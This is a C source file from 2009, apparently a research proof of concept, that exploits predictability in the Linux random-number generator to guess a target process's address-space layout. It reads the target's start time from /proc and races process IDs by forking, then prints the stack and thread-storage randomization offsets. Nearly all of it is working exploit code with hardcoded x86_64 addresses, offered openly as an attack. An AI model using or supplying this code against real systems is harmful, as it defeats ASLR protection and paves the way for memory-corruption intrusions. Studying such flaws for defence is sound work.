/* guess_randomization.c by Hagen Fritsch, 2009
 * distributed under GPL
 *****************************************************
 * tries to exploit flaw in the linux random-number
 * generator to output a list of possible randomizations
 * of a given process */
 
#include <stdio.h>
#include <string.h>
#include <sys/time.h>
#include <time.h>
#include <unistd.h>
#include <errno.h>

#define HZ 250
#define USER_HZ 100

//28 for x86_64
// 8 for i386
#define RANDOM_BITS 28
#define PAGE_SHIFT 12
#define RANDOMIZATION(x) ((x) & ((((long) 1<<RANDOM_BITS)-1) << PAGE_SHIFT))

/* this might change from libc to libc
 * run ./acquire_stataddr
 * with aslr being disabled to obtain the values */
#define ADDROF_TLB 0x7ffff7fde6e0
#define ADDROF_STACK 0x7fffffffe2c8
#define ADDITIONAL_STACK_OFFEST 0x530

void print_randomization(void) {
  unsigned long stack= (unsigned long) &stack;
  char buf[1024];
  unsigned long tlb;
  
  asm("mov %%fs:0x00, %0" : "=r"(tlb));
  sprintf(buf, "stack randomization offset: 0x%08lx (page: 0x%08lx)\n",
	 ADDROF_STACK-ADDITIONAL_STACK_OFFEST-stack, (ADDROF_TLB-tlb) >> 12);
  write(1, buf, strlen(buf));
}
/* read /proc/%d/stat to get the start_time,
   stolen from ps */
unsigned long get_start_time(char * path) {
	int pid;
	unsigned long long start_time;
	FILE * f = fopen(path, "r");
	fscanf(f, "%d (%*s %*c "
       "%*d %*d %*d %*d %*d "
       "%*lu %*lu %*lu %*lu %*lu "
       "%*Lu %*Lu %*Lu %*Lu "  /* utime stime cutime cstime */
       "%*ld %*ld "
       "%*d "
       "%*ld "
       "%Lu ", &pid, &start_time);
       fclose(f);
       return start_time;
}
unsigned long get_pid_start(int pid) {
	char buf[1024];
	sprintf(buf, "/proc/%d/stat", pid);
	return get_start_time(buf);
}

/* get a time_stamp in jiffie units */
unsigned long get_time_jiffies(void) {
  struct timeval start;
  gettimeofday(&start, NULL);
  return ((start.tv_sec * 1000) + (start.tv_usec / 1000)) / (1000 / HZ);
}

int main(int argc, char ** argv, char ** env) {
  /* safe this process’ start_time */
  unsigned long start_time = get_time_jiffies();
  char buf[64];
  
  /* read the start times of the target and myself */
  unsigned int  start_target,
  	        start_self   = get_start_time("/proc/self/stat");
 
  /* approximate the jiffy difference */
  unsigned int  guess_jiffies;
           int  want_pid,
                child_pid,
                target_pid;
  
  if( argc < 2) {
    printf("usage: %s pid\n", argv[0]);
    return 0;
  }
  target_pid    = strtol(argv[1], NULL, 10);
  start_target  = get_pid_start(target_pid);
  guess_jiffies = (start_self - start_target) * HZ / USER_HZ;
  
  if( argc == 3) { /* final process */
    int perfect_jiffies = target_pid - getpid() - guess_jiffies;
    int now = strtol(argv[2], NULL, 10);
    if(now != 0) start_time = now;
    
    do {
      usleep(1000000 / (HZ*2));
      now = (unsigned long) (get_time_jiffies() - start_time);
    } while(now < perfect_jiffies - 6);
    
    if((unsigned int) (now - perfect_jiffies + 2) <= 4) write(1, "*", 1);
    sprintf(buf, "\t%d\t", now-perfect_jiffies);
    write(1, buf, strlen(buf));
    print_randomization();
    
    if( now >= perfect_jiffies + 6)
      return 0;
    sprintf(argv[2], "%ld", start_time);
    execve(argv[0], argv, env);
    printf("%d\n", errno);
    return 0;
  }
  
  while(1) {
    /* calculate which pid we need for the attack,
     * have a time buffer of 100 jiffies,
     * launch the guessing process that will write the randomization
     * for some amount of jiffies */
     
    want_pid = target_pid - guess_jiffies - (unsigned long) (get_time_jiffies() - start_time);
    if(want_pid < 10) {
      puts("You lost the race.");
      return 0;
    }

    if((child_pid = fork()) == 0) { //parent
        child_pid = getpid();
    	if(child_pid > want_pid - 100 && child_pid < want_pid) {
    	  char * st_time = "00000000000000000000";
    	  char * t_argv[] = { argv[0], argv[1], st_time, NULL };
    	  execve(argv[0], t_argv, env);
    	}
    	break; //exit
    } else {
      if(child_pid > want_pid - 100 && child_pid < want_pid)
        break; //exit
    }
  }
  return 0;
}
